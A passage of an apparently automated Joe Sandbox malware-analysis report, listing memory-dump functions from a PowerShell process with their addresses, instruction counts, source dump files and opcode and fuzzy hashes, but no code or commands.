                                                    • Instruction ID: 59d4678d5597a467ffe9875e2cda902c56425e654fcf1f643603793931f64a78
                                                    • Opcode Fuzzy Hash: 20e60d59877a34067810065ffaa4c147c9be8fceb639347edb762661cb526fc8
                                                    • Instruction Fuzzy Hash: C9224C30B042188FDB25DB64D8947AEB7B2BF89304F1584A9D40AAB365DF35ED85CF81
                                                    Function 04748A40 Relevance: .3, Instructions: 319COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8dfa5530c4cddb334ca839d31af4b7416014127b465f7abe69f14cff2cfce5d4
                                                    • Instruction ID: 776f075520e4ff11318d4e6be19a9499fbebafec7103552a959a80128f1199c6
                                                    • Opcode Fuzzy Hash: 8dfa5530c4cddb334ca839d31af4b7416014127b465f7abe69f14cff2cfce5d4
                                                    • Instruction Fuzzy Hash: 83C19C35A00208DFDB14EFA4C844AADBBB2FFC9314F164569E406AB365CB74ED49CB41
                                                    Function 0474E69D Relevance: .3, Instructions: 277COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c3dd608dc80f317a2614a6cf6496d44880df2249889b88bdffb3ab3ecb01a49
                                                    • Instruction ID: 0783bca5f2a24c460566432bca048952f900297cd7c4a1d179641424c980c016
                                                    • Opcode Fuzzy Hash: 9c3dd608dc80f317a2614a6cf6496d44880df2249889b88bdffb3ab3ecb01a49
                                                    • Instruction Fuzzy Hash: 79B14C70E00219CFDF10CFA9D8857AEBBF5BF88324F148529E814A7394EB74A845CB81
                                                    Function 0474EF72 Relevance: .3, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5cd60232c0d18f4766e65c8cfcef99e66f2af541c55f82d4af9e9bb617095c91
                                                    • Instruction ID: 7002b56c120c16a0f11cfdec7397a4876d7c025fb8d299cb27c3de1fa7fb1d88
                                                    • Opcode Fuzzy Hash: 5cd60232c0d18f4766e65c8cfcef99e66f2af541c55f82d4af9e9bb617095c91
                                                    • Instruction Fuzzy Hash: 77A14D70E00209CFDB10CFA9D9857EEBBF1AF89714F148529D814EB354EB75A885CB91
                                                    Function 07430388 Relevance: .2, Instructions: 244COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87c9390967e4440159b17b4d1c1f449c3931814ad0e38553d3d3f1e9fce0c4f8
                                                    • Instruction ID: c7e2140d7958e645a26989fb4a3d2fd1d1d9f8fc41df1051af4381181caa4005
                                                    • Opcode Fuzzy Hash: 87c9390967e4440159b17b4d1c1f449c3931814ad0e38553d3d3f1e9fce0c4f8
                                                    • Instruction Fuzzy Hash: 6A8168B1B00316DFDB249BA888007EBBBA3AF89210F14866BD50DEB351DA71D901C7A1
                                                    Function 04742B48 Relevance: .2, Instructions: 235COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ebd9231b3230801047ab6c6b7163e2b1ed711a8550057de3d8a8456b94b7a5f
                                                    • Instruction ID: 7f4c939a3c2abf75847ee902d9301dd653592ebf4fb015ffffc349959056c23c
                                                    • Opcode Fuzzy Hash: 3ebd9231b3230801047ab6c6b7163e2b1ed711a8550057de3d8a8456b94b7a5f
                                                    • Instruction Fuzzy Hash: 79A19E74A04645CFCB05CF98C494AAAFBB1FF89310B24859AE455EB3A6C735FC51CBA0
                                                    Function 047482A0 Relevance: .2, Instructions: 207COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00e89f5be4e2b386f21cdee3432bda947fb0365b0af4a99aedbbb2e6f8f9cbc4
                                                    • Instruction ID: 06dc55c5dd5d00560dfd4ef36cfd74230aec7cc2a5f2c62e50ec1a14380a7e8e
                                                    • Opcode Fuzzy Hash: 00e89f5be4e2b386f21cdee3432bda947fb0365b0af4a99aedbbb2e6f8f9cbc4
                                                    • Instruction Fuzzy Hash: D081E234A01248DFCB15DFA4C8849ADBBF2FF89314F1984A9E405AB361CB35EC45DB51
                                                    Function 04749208 Relevance: .2, Instructions: 193COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ef8a7fc3a3d90a02a0e8bd1f34e879674d9716f450025fd62aad02a2f4f893a
                                                    • Instruction ID: 741198b87ea89d15321f84ca4b714e91fec0968888354d95b164158aeefaa4f1
                                                    • Opcode Fuzzy Hash: 3ef8a7fc3a3d90a02a0e8bd1f34e879674d9716f450025fd62aad02a2f4f893a
                                                    • Instruction Fuzzy Hash: 21717BB1A002098FCB24DF64D884AAEBBF2FF85314F158569D4069B7A1DB74AC46CB81
                                                    Function 04749376 Relevance: .2, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dea17e7b9f86a26217aeb7efbc67448b170f85ab2276719c17289c797f27e04f
                                                    • Instruction ID: 617885a38110f4a5f40abfe675b7d02fe3ec86a12f6b6268b53c9a4aa41af2e1
                                                    • Opcode Fuzzy Hash: dea17e7b9f86a26217aeb7efbc67448b170f85ab2276719c17289c797f27e04f
                                                    • Instruction Fuzzy Hash: AB713CB1A00209DFDB14DFB5D454BAEBBF2BF88308F148429D502AB3A0DB75AD45CB51
                                                    Function 0743486F Relevance: .2, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc0221366c6cdb3e46359ef38cf2c4a7cadd3b654e8b4f6fa07102caf686d2f5
                                                    • Instruction ID: 9ac791f5f2b1becea625fe076616a84759bbe945e4fda4eb57d25462c6175a93
                                                    • Opcode Fuzzy Hash: fc0221366c6cdb3e46359ef38cf2c4a7cadd3b654e8b4f6fa07102caf686d2f5
                                                    • Instruction Fuzzy Hash: D7715AB4A00241DFD714CB98C540FBABBB2AF8A314F15C56ADA095B351DB76EC82CB81
                                                    Function 0474ECE4 Relevance: .2, Instructions: 181COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a380751bae24c2e4300aa45eecb28d23594223e5c5e5ed6932afc82529f18105
                                                    • Instruction ID: dc85f5d2a78b8eec3d6fbd0e327fd747ced212439857de92aa0cd11468bcd3af
                                                    • Opcode Fuzzy Hash: a380751bae24c2e4300aa45eecb28d23594223e5c5e5ed6932afc82529f18105
                                                    • Instruction Fuzzy Hash: 24712A70E00219DFEB10CFA9D8447AEBBF2FF88724F148529E414A7354EB74A945CB91
                                                    Function 0474ECF0 Relevance: .2, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 592a6566f76f38a892e67e86ce4a8b38b631dd64788ff7c1e092721a87f00492
                                                    • Instruction ID: e3c1320bc4fe0bdd587dfc960d71ef9311f52f29c6f805d4844b10fed46f72b4
                                                    • Opcode Fuzzy Hash: 592a6566f76f38a892e67e86ce4a8b38b631dd64788ff7c1e092721a87f00492
                                                    • Instruction Fuzzy Hash: 44713B70E00219DFEB14CFA9D8447AEBBF2BF88724F148429E415A7354EB74A941CB91
                                                    Function 07439D5C Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79d5670a2ed4978b2781e0a4378eb2c0b68e332429792a2b6f56a09fa56815db
                                                    • Instruction ID: beede2c40eac0390d31010f82de808ba264e36669fa01a802628ad24a3b31e8c
                                                    • Opcode Fuzzy Hash: 79d5670a2ed4978b2781e0a4378eb2c0b68e332429792a2b6f56a09fa56815db
                                                    • Instruction Fuzzy Hash: A14126F1604212DFDB208F6984427E6B7A2DF88208B1944ABD5089B395D7B5FC81CB65
                                                    Function 04748F99 Relevance: .1, Instructions: 118COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e2c63c8c675c375bcd84f56b5171e04c1bb7ce0b1d380fc55f5573acffc38f1
                                                    • Instruction ID: 4f16f5235231d41addfa9284ae1bbda2c43f27b0d259291257070c2ac779c7c0
                                                    • Opcode Fuzzy Hash: 9e2c63c8c675c375bcd84f56b5171e04c1bb7ce0b1d380fc55f5573acffc38f1
                                                    • Instruction Fuzzy Hash: DA4179B5B002048FDB249B74D958AAE7BF2FFC9755F054068E50AEB7A0CB35AC41DB50
                                                    Function 047491F3 Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c540378b563c7ae61a24a5fa864a888b7faf5ead4c3033a182ed454b1bca2f12
                                                    • Instruction ID: 31209778db59afc24f153aa21cc0a2c2f6f88bd20b4aa4a203a4be8d002ebbb5
                                                    • Opcode Fuzzy Hash: c540378b563c7ae61a24a5fa864a888b7faf5ead4c3033a182ed454b1bca2f12
                                                    • Instruction Fuzzy Hash: 27415CB0A00209CFDB24DFB5C844BAEBBF2BF89304F148569D406AB7A4DB74AC45CB40
                                                    Function 04742C59 Relevance: .1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4e4c8c622c5a8d07f7f6387742bf22c84d4d0120941d2f72119fe98740634a70
                                                    • Instruction ID: 1698fc04291085ec26de5b070b31e44b5dcb5f3c6667fc1546c4021252c56e7e
                                                    • Opcode Fuzzy Hash: 4e4c8c622c5a8d07f7f6387742bf22c84d4d0120941d2f72119fe98740634a70
                                                    • Instruction Fuzzy Hash: 5B412A749006059FCB05CF99C594AAAFBB1FF88310B118599E4159B3A5C732FC60CFA4
                                                    Function 07430BA8 Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9a5f6867b6f70c67ddb27491267a0bad071993917fdf109e0fe7e545e50042c
                                                    • Instruction ID: 2699573ef12b53d5c794e49bb379bee2c4cad9d4e5fdb4abf5992dbf5e106abd
                                                    • Opcode Fuzzy Hash: b9a5f6867b6f70c67ddb27491267a0bad071993917fdf109e0fe7e545e50042c
                                                    • Instruction Fuzzy Hash: E021BBB131430A9BEB3855A988407B7B6DB9FC9615F24853BA50DCB391DF75C8418361
                                                    Function 07430A78 Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf0f3819d223737fbfcccaa1194f1fb6833ba7f269738aadf7c21710263554c3
                                                    • Instruction ID: c5ab3cd3c9af2f6c9d35b7846cf1536a5b6508a39449bce4760f5d443ebc1957
                                                    • Opcode Fuzzy Hash: bf0f3819d223737fbfcccaa1194f1fb6833ba7f269738aadf7c21710263554c3
                                                    • Instruction Fuzzy Hash: 012179B1300306DBEB2466E99800BBBB2979FC9705F24853B950ADB390DEB5D8418371
                                                    Function 0474B868 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ef71400a474f144372e7ed2129733755c2281f5f4aa76e82ac862a5be3542930
                                                    • Instruction ID: 29f30c2d23ef7a1db29b347ed7ff2742df461d7443fa638b40651478df155663
                                                    • Opcode Fuzzy Hash: ef71400a474f144372e7ed2129733755c2281f5f4aa76e82ac862a5be3542930
                                                    • Instruction Fuzzy Hash: 3D312A30B052588FCB25DB64C8946EEB7B2BF89304F1144E9D509AB355DB35EE86CF81
                                                    Function 07430A58 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 65be3f538effc744b2ced79b7ed2b1a362cf2898bd2844eb17ad892763c0e455
                                                    • Instruction ID: fd27a79928b871366311d36f15858508fef152d3e5bca511bf4a770d1156c021
                                                    • Opcode Fuzzy Hash: 65be3f538effc744b2ced79b7ed2b1a362cf2898bd2844eb17ad892763c0e455
                                                    • Instruction Fuzzy Hash: FA2178B1308385ABEB2116B588107B77FA75F8A300F2944ABD589DB3E2D6798880C331
                                                    Function 07430B8C Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0fe7fece01ec20a3dd65b419cecd6c40194c2555bd671c67b63242fab337eb1f
                                                    • Instruction ID: 5d9e8f392a4e1c36c58703f3b47703fe53da5da70c5f5303ad4bdf77f1066f1d
                                                    • Opcode Fuzzy Hash: 0fe7fece01ec20a3dd65b419cecd6c40194c2555bd671c67b63242fab337eb1f
                                                    • Instruction Fuzzy Hash: FB2138B12183469FEB350AB588407B37FA79F86605F284667E54CDB3A2D7798880C322
                                                    Function 07430668 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0c2f425ac7953f89e3356c71cbf4464994c42bb9adefc4b1632aea98d6e8e62
                                                    • Instruction ID: 76ba49827353593a9c8557e5fc96a4d7ca4cfb5c61764c6be99ebe0b7547ca6c
                                                    • Opcode Fuzzy Hash: d0c2f425ac7953f89e3356c71cbf4464994c42bb9adefc4b1632aea98d6e8e62
                                                    • Instruction Fuzzy Hash: 9301F7B63002168FD76099AAD4006BBB7979FC9632F14C53BE549C7364D672C845C7A0
                                                    Function 0474E993 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d38d74bf7611732f89639c2413d878de4f938f57614bf3ffcecdac78df30872
                                                    • Instruction ID: f25931a55e50db53964ecfae703be350317cc15a3a5085f7f21d2fd5c92e0c80
                                                    • Opcode Fuzzy Hash: 5d38d74bf7611732f89639c2413d878de4f938f57614bf3ffcecdac78df30872
                                                    • Instruction Fuzzy Hash: D8119D30D04258DBEF74DE98E5887BCB7B1BF85329F14142AC051B62D0AB746889CB12
                                                    Function 047431E3 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c400211ca415a5e98832c8b66b6db0dccdc4545ebced6a238e4e9d160a64401
                                                    • Instruction ID: 57deb6f8e73e1756fc64bf224fe341de5a15edba31210b9c5ea9bd37ac5ccde6
                                                    • Opcode Fuzzy Hash: 6c400211ca415a5e98832c8b66b6db0dccdc4545ebced6a238e4e9d160a64401
                                                    • Instruction Fuzzy Hash: 19014478B402159FDB00DB98D490AADF771FF9D304B248159D95AA7361C735EC039B50
                                                    Function 045AD01D Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1713949473.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_45ad000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0b511cac87b395d991d4b9a463c8c0b7ddb1ad1ac54053ae53af33ce83e76e5
                                                    • Instruction ID: 14ea86785a903fc382d2d4f6c9f43bb68b81d8367555a8e1207c13bed5e0449d
                                                    • Opcode Fuzzy Hash: d0b511cac87b395d991d4b9a463c8c0b7ddb1ad1ac54053ae53af33ce83e76e5
                                                    • Instruction Fuzzy Hash: 52012B315047409FE710AE22ED84B6FBFE8FF41324F18C41AED484B542E679A449DBB2
                                                    Function 045AD006 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1713949473.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_45ad000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b073cf1bb551041676ce0fbf611983b1993d52120da1d30a923de6fedb90f38a
                                                    • Instruction ID: 58efc6bc17a1be991c9d18dda11642af1840d7116d7271893b40c77fb42966a9
                                                    • Opcode Fuzzy Hash: b073cf1bb551041676ce0fbf611983b1993d52120da1d30a923de6fedb90f38a
                                                    • Instruction Fuzzy Hash: B7019E3200E3C05FE7129B219D94B56BFB4EF53224F19C0CBD8888F5A3C2699849CB72
                                                    Function 0474FC3F Relevance: .0, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1714480947.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_4740000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 185506f38961da189fe67711f49a90ef02906846cae3605a7c7a84b28cd1278e
                                                    • Instruction ID: e71032f4ed5d43733935488daa854f9cd48461c17e0a9eb858eda11333bee955
                                                    • Opcode Fuzzy Hash: 185506f38961da189fe67711f49a90ef02906846cae3605a7c7a84b28cd1278e
                                                    • Instruction Fuzzy Hash: 7C014F35A00219DFDB14CF88D880AADF7B2FF88324B218669D819A7654C732FC51CB94
                                                    Function 07432ED4 Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36b6e63dcc4c84023896cd7f0f38b5656397ebaec5376d9d9bef8e6cd4fa037a
                                                    • Instruction ID: 8cbdea2e43befa848398705bf59a1b163a67d155342a66e9c77e500bb197f615
                                                    • Opcode Fuzzy Hash: 36b6e63dcc4c84023896cd7f0f38b5656397ebaec5376d9d9bef8e6cd4fa037a
                                                    • Instruction Fuzzy Hash: E0F0A9B42093819FC3168B00C890981BFB2BF8B205B0DC0CBE2488F2A3C372D882C791
                                                    Function 07432D85 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 622278a82be5cf5240061ee2936e223a3a1d0f06fbeea7aaa19b361fe119e042
                                                    • Instruction ID: 557b0d54d2102b8299739d1b32cad46942ff2566ba487c0ccc606eac7b36eabc
                                                    • Opcode Fuzzy Hash: 622278a82be5cf5240061ee2936e223a3a1d0f06fbeea7aaa19b361fe119e042
                                                    • Instruction Fuzzy Hash: 0DE065B65092418FC7558B00C5547D1BF71BF46215F08C1CBC46C4F293C7B2D886C790

                                                    Non-executed Functions

                                                    Function 045AD420 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1713949473.00000000045AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045AD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_45ad000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2ee048e363195c80c60715c44b028eba2e6488c8c1f7d737eb705db5a85e74f
                                                    • Instruction ID: 3da21ac50e5c4b6e30bb0e7078c7df938de9c1b3d70e509c3a7903fb282f4556
                                                    • Opcode Fuzzy Hash: b2ee048e363195c80c60715c44b028eba2e6488c8c1f7d737eb705db5a85e74f
                                                    • Instruction Fuzzy Hash: 93218BB16043409FDB04FF10E5C0B29BB76FB84314F20C56CC80A4B641C3BAF85AC662
                                                    Function 0743D0ED Relevance: 5.3, Strings: 4, Instructions: 286COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 84kl$84kl$84kl$84kl
                                                    • API String ID: 0-1547189694
                                                    • Opcode ID: bd791706c4e5ae7d9802ccc97748ed2055e0592d9421dbba565d4b28d713b784
                                                    • Instruction ID: 26ce87688157bef8b1b1d04a78cc7707ad69e09bb25e7f3d167949477e80e76c
                                                    • Opcode Fuzzy Hash: bd791706c4e5ae7d9802ccc97748ed2055e0592d9421dbba565d4b28d713b784
                                                    • Instruction Fuzzy Hash: 18A1B4B1F10205DFEB249FA4C444BEBB7A2AF8D210F148466E849AB391DB75DC41CFA1
                                                    Function 074370D8 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$(fml$(fml
                                                    • API String ID: 0-679830726
                                                    • Opcode ID: 72d1739c41a97b4f7c6a3cd7dda78f45c1b7405b0753f473aabdbb0cbc113762
                                                    • Instruction ID: a911564d1c12c132a530dc97ac9b99f09f60f0eb58c02f47c1ce5d12a591268f
                                                    • Opcode Fuzzy Hash: 72d1739c41a97b4f7c6a3cd7dda78f45c1b7405b0753f473aabdbb0cbc113762
                                                    • Instruction Fuzzy Hash: 8DA150F1E00205DBEB25CF94C480AAAFBB2BF8D714F14891AD8996B714D771F842CB51
                                                    Function 07437510 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (fml$(fml$(fml$(fml
                                                    • API String ID: 0-679830726
                                                    • Opcode ID: 6484ef2a24dbd74dbd7ce9066323abc13baf9c60a69c3e9a0a9f1910f2c7b00b
                                                    • Instruction ID: 03f3433c3b8c3bef397622d0b82a9691a3c646a09959e5dbf6fb1b3442590f23
